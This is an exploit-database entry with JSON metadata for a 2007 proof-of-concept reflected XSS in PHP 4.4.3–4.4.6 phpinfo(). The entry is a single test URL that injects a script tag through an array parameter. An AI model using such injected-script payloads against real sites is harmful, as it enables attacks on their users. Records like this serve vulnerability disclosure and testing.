ID 1337DAY-ID-8858
Type zdt
Reporter Stefan Esser
Modified 2007-03-04T00:00:00
Description
Exploit for multiple platform in category remote exploits
====================================================
PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability
====================================================
////////////////////////////////////////////////////////////////////////
// _ _ _ _ ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ //
// | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| //
// //
// Proof of concept code from the Hardened-PHP Project //
// (C) Copyright 2007 Stefan Esser //
// //
////////////////////////////////////////////////////////////////////////
// PHP 4 - phpinfo() XSS Testcase //
////////////////////////////////////////////////////////////////////////
To manually test for this vulnerability just call the phpinfo() page with a parameter like this.
http://localhost/phpinfo.php?a[]=<script>alert(/XSS/);</script>
# 0day.today [2018-02-06] #
{"id": "1337DAY-ID-8858", "lastseen": "2018-02-06T07:18:35", "viewCount": 9, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-02-06T07:18:35", "rev": 2}, "dependencies": {"references": [], "modified": "2018-02-06T07:18:35", "rev": 2}, "vulnersScore": 0.2}, "type": "zdt", "sourceHref": "https://0day.today/exploit/8858", "description": "Exploit for multiple platform in category remote exploits", "title": "PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability", "cvelist": [], "sourceData": "====================================================\r\nPHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability\r\n====================================================\r\n\r\n\r\n ////////////////////////////////////////////////////////////////////////\r\n // _ _ _ _ ___ _ _ ___ //\r\n // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \\| || || _ \\ //\r\n // | __ |/ _` || '_|/ _` |/ -_)| ' \\ / -_)/ _` ||___|| _/| __ || _/ //\r\n // |_||_|\\__,_||_| \\__,_|\\___||_||_|\\___|\\__,_| |_| |_||_||_| //\r\n // //\r\n // Proof of concept code from the Hardened-PHP Project //\r\n // (C) Copyright 2007 Stefan Esser //\r\n // //\r\n ////////////////////////////////////////////////////////////////////////\r\n // PHP 4 - phpinfo() XSS Testcase //\r\n ////////////////////////////////////////////////////////////////////////\r\n\r\nTo manually test for this vulnerability just call the phpinfo() page with a parameter like this.\r\n\r\nhttp://localhost/phpinfo.php?a[]=<script>alert(/XSS/);</script>\r\n\r\n\r\n\r\n\n# 0day.today [2018-02-06] #", "published": "2007-03-04T00:00:00", "references": [], "reporter": "Stefan Esser", "modified": "2007-03-04T00:00:00", "href": "https://0day.today/exploit/description/8858", "immutableFields": []}
{}